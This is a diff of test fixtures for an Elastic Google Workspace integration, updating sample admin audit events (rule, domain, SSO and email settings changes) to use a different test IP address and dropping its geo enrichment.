"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CREATE_RULE", "id": "1", @@ -5914,7 +4618,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5938,35 +4642,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091470100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916130200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CHANGE_RULE_CRITERIA", "id": "1", @@ -5996,7 +4682,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6020,35 +4706,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091472800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916136100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "DELETE_RULE", "id": "1", @@ -6078,7 +4746,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6100,35 +4768,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091475800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916142300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_RULE", "id": "1", @@ -6158,7 +4808,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6180,35 +4830,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091478900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916146500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_STATUS_CHANGED", "id": "1", @@ -6238,7 +4870,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6262,35 +4894,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091481500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916151300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "ADD_SECONDARY_DOMAIN", "id": "1", @@ -6320,7 +4934,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6344,35 +4958,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091484500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916156900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "REMOVE_SECONDARY_DOMAIN", "id": "1", @@ -6402,7 +4998,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6426,35 +5022,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091487500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916161200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "SKIP_SECONDARY_DOMAIN_MX", "id": "1", @@ -6484,7 +5062,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6508,35 +5086,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091512200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916165800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN_MX", "id": "1", @@ -6566,7 +5126,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6590,35 +5150,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091516200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916171700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN", "id": "1", @@ -6648,7 +5190,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6672,35 +5214,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091519400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916176300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_SECONDARY_EMAIL", "id": "1", @@ -6730,7 +5254,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6754,35 +5278,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091521900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916180500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CHANGE_SSO_SETTINGS", "id": "1", @@ -6813,7 +5319,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6832,35 +5338,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091524400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}", + "ingested": "2021-12-09T13:38:31.916184800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}", "provider": "admin", "action": "GENERATE_PIN", "id": "1", @@ -6890,7 +5378,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -6914,35 +5402,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091526800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916189400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "UPDATE_RULE", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log index dc0842dc0d4..674f4773472 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log 
@@ -1,9 +1,9 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
